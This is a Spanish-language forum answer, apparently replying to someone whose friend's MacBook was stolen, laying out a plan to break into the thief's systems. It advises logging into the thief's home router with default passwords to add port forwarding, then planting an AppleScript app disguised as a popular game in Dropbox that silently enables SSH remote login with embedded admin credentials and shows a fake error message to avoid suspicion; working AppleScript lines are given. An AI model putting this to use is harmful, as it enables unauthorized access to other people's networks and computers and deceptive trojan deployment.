Recuerdo haber visto ese video del Dr. Zoz. Buen material.
Parece que eres competente con las secuencias de comandos de shell y solo necesitas un vector de ataque. La clave para hacer algo similar a lo que hizo Zoz es obtener acceso SSH. A diferencia de su situación, donde el ladrón estaba usando un módem de acceso telefónico, es casi seguro, dado que las Mac más nuevas no hacen acceso telefónico, que el ladrón está usando una conexión de banda ancha y está detrás de algún tipo de enrutador NAT.
Incluso si SSH estuviera habilitado en la máquina, el reenvío de puertos tendría que estar configurado en el enrutador para que pueda acceder al puerto de escucha SSH de la máquina desde el exterior. La ventaja de una conexión de banda ancha es que la dirección IP cambiará casi siempre con menos frecuencia que con el acceso telefónico.
Si estuviera en su posición, sosteniendo la IP del ladrón, primero trataría de iniciar sesión en la interfaz web de su enrutador y ver qué puedo hacer desde allí. Es sorprendente cuántas personas dejan sus contraseñas predeterminadas de enrutador / módem en su lugar, y hay listas en línea donde puede encontrar las contraseñas predeterminadas para la mayoría de los principales fabricantes.
Una vez dentro, verifique la lista de clientes DHCP en el enrutador y vea si puede encontrar el MacBook. Muchos enrutadores mostrarán la dirección MAC (hardware), la dirección IP interna asignada (192.168.1.x más a menudo) y lo más importante, el nombre de la máquina.
Averigua qué IP está asignada al MacBook y luego configura un puerto hacia adelante en la configuración del enrutador. Utilice algún puerto externo que no sea el 22 (por ejemplo, el puerto 2222) y reenvíelo al puerto 22 de la IP del MacBook.
Muchos enrutadores tienen el acceso SSH activado, por lo que acceder al puerto IP @ 22 del ladrón puede llevarlo al shell del enrutador en lugar del shell de la máquina. Ahora debería tener un puerto en la IP externa del ladrón (que obtuvo de Dropbox) que lo llevará directamente al puerto al que SSH debe estar vinculado en el MacBook. Excepto que SSH aún no está activado.
Esta parte requiere alguna acción del ladrón. Me gusta la idea del correo electrónico, pero requiere que tu amigo use Apple Mail. Un mejor enfoque podría ser subir un tentador archivo .app a Dropbox que activará SSH (inicio de sesión remoto).
Puede hacer esto a través de un script de shell, pero hacerlo a través de Applescript, guardar el Applescript como .app y darle un buen ícono ayudará a engañar a su marca y no darse a sí mismo.
Aquí está el código de Applescript para activar el inicio de sesión remoto:
do shell script "sudo systemsetup setremotelogin on" user name "Friend's Username" password "Friend's Password" with administrator privileges
Este bit de código devolverá una cadena con el número de serie de la máquina que puede enviarse por correo electrónico si desea hacer eso:
do shell script "sudo system_profiler |grep \"r (system)\"" user name "Friend's Username" password "Friend's Password" with administrator privileges
Escribiría el applecript para que active Remote Login, haga lo que sea que necesite. Intente no escribir la GUI ni ninguna otra aplicación además del shell, ya que esto generará sospechas. Al final, muestra un mensaje que dice "Esta aplicación no puede ejecutarse en este Macintosh". con un botón "Salir" para reducir las sospechas. Una vez que el script esté funcionando en el Editor AppleScript, guárdelo como un archivo .app de solo ejecución.
Intenta disfrazar el .app como un juego popular, Plants vs. Zombies o Angry Birds o algo así. Puedes exportar el ícono del .app del juego real y ponerlo en el .app que exportas de Applescript. Si tu amigo echó un buen vistazo al ladrón, puedes perfilarlo socialmente y disfrazar la aplicación como algo más en lo que podrían estar interesados.
Siempre que pueda configurar el puerto hacia adelante (su marca no aplica las prácticas de seguridad adecuadas), y puede hacer que ejecute la aplicación, tendrá acceso SSH completo a la máquina y puede seguir buscando pistas sin inmediatamente regalando tu presencia. Esto también requiere que la marca no se canse de las notificaciones de Dropbox Growl y la abandone, por lo que le aconsejaría a su amigo que deje de guardar archivos en su Dropbox por un tiempo.
Nota: Si el ladrón se desconecta de su ISP y se vuelve a conectar, obtendrá una nueva IP externa. Agregue un archivo a Dropbox y espere a que se sincronice. Esto debería obtener la IP actualizada.
Nota 2: si el usuario no se conecta al enrutador con el MacBook durante un cierto período de tiempo (generalmente 24 horas), la concesión de DHCP para la dirección IP interna que se asignó al MacBook caducará. Lo más probable es que obtenga la misma dirección IP la próxima vez que se conecte, a menos que se introduzca otro dispositivo en la red. En este caso, deberá volver a iniciar sesión manualmente en el enrutador y modificar el puerto hacia adelante.
Este no es el único medio de ataque, pero esto es lo que haría en el momento en que me di cuenta de que la IP todavía se estaba actualizando a través de Dropbox. ¡Buena suerte!
EDITAR: Los "privilegios de administrador" al final de cada línea "do script script" son muy importantes. Se le solicitará al usuario la contraseña de administrador de su amigo y la secuencia de comandos fallará si no incluye el nombre de usuario y la contraseña en línea.